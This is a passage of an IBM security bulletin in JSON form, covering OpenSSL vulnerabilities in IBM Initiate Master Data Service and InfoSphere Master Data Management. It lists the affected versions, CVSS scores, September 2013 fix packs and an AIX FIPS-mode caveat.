<https://exchange.xforce.ibmcloud.com/vulnerabilities/81903> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P) \n \n**AFFECTED PRODUCTS:** \n \n\u00b7 IBM Initiate Master Data Service versions 9.5 and 9.7 \n\u00b7 IBM InfoSphere Master Data Management Standard Edition versions 10.0 and 10.1 \n\n\n**REMEDIATION: **\n\n**_Fixes:_**\n\n**Important Limitation:**\n\nResolution of the vulnerabilities in this security bulletin is accomplished by installing and using a later version of OpenSSL. 
On AIX, and on AIX only, the current version of OpenSSL has known breaking issues in TLS when FIPS mode is enabled. Based on this, FIPS mode is disabled when the version of OpenSSL included in the fixes below is installed for use by brokers on AIX. No change is made to the current configuration of FIPS mode for OpenSSL when installing the fixes below on any other operating system.\n\nAn attempt to enable FIPS mode for OpenSSL on AIX after installing the fixes below will result in a FIPS fingerprint error in the broker logs.\n\n\u00b7 For IBM Initiate Master Data Service version 9.5.\n\n \no Install \u201c[_September 2013 Fix Pack for v9.5 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=InfoSphere+Master+Data+Management&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=9.5&platform=All&function=all>)\u201d \n \n\u00b7 For IBM Initiate Master Data Service version 9.7. \no Install \u201c[_September 2013 Fix Pack for v9.7 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=InfoSphere+Master+Data+Management&product=ibm/Information+Management/IBM+Initiate+Master+Data+Service&release=9.7&platform=All&function=all>)\u201d \n \n\u00b7 For IBM InfoSphere Master Data Management Standard Edition version10.0 \no Install \u201c[_September 2013 Fix Pack for v10.0 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information+Management&product=ibm/Information+Management/InfoSphere+Master+Data+Management&release=10.0&platform=All&function=all>)\u201d \n \n\u00b7 For IBM InfoSphere Master Data Management Standard Edition version 10.1 \no Install \u201c[_September 2013 Fix Pack for v10.1 MDS_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=ibm~Information+Management&product=ibm/Information+Management/InfoSphere+Master+Data+Management&release=10.1&platform=All&function=all>)\u201d \n \n \n**_Workaround(s) & Mitigation(s):_** None known. 
\n \n \n**REFERENCES: ** \n[](<https://www-304.ibm.com/support/docview.wss?uid=swg21496117&wv=1>)[\u00b7 _Complete CVSS Guide_](<http://www.first.org/cvss/v2/guide>) \n[\u00b7 _On-line Calculator V2_](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>) \n \n**RELATED INFORMATION: ** \n\u00b7 [_IBM Secure Engineering Web Portal_](<https://www-304.ibm.com/jct03001c/security/secure-engineering/>) \n\u00b7 [_IBM Product Security Incident Response Blog_](<https://www.ibm.com/blogs/PSIRT>) \n \n**ACKNOWLEDGEMENT: **None \n \n**CHANGE HISTORY: ** \ndd-mmm-yyyy Original version published \n\n\n_*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash. _\n\n \n**_Note: _**_According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY._\n\n[{\"Product\":{\"code\":\"SSLVY3\",\"label\":\"Initiate Master Data Service\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF016\",\"label\":\"Linux\"}],\"Version\":\"9.5.0;9.7.0\",\"Edition\":\"\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}},{\"Product\":{\"code\":\"SSWSR9\",\"label\":\"IBM InfoSphere Master Data Management\"},\"Business Unit\":{\"code\":\"BU059\",\"label\":\"IBM Software w\\/o TPS\"},\"Component\":\"Not Applicable\",\"Platform\":[{\"code\":\"PF002\",\"label\":\"AIX\"},{\"code\":\"PF016\",\"label\":\"Linux\"},{\"code\":\"PF027\",\"label\":\"Solaris\"},{\"code\":\"PF033\",\"label\":\"Windows\"},{\"code\":\"PF010\",\"label\":\"HP-UX\"}],\"Version\":\"10.1;10.0\",\"Edition\":\"Standard\",\"Line of Business\":{\"code\":\"LOB10\",\"label\":\"Data and AI\"}}]", "cvss3": {}, "published": "2022-09-26T03:31:32", "type": "ibm", "title": "Security Bulletin: Multiple vulnerabilities exist in the OpenSSL component of IBM Initiate Master Data Service and IBM InfoSphere Master Data Management Standard Edition (CVE-2013-0166, CVE-2013-0169, CVE-2012-2686)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2686", 
"CVE-2013-0166", "CVE-2013-0169", "CVE-2013-2686"], "modified": "2022-09-26T03:31:32", "id": "51A25EC520455269A79F9DDA6AEB73FB003F12BAA0B35BFB5A6A50A403534F59", "href": "https://www.ibm.com/support/pages/node/497667", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}]}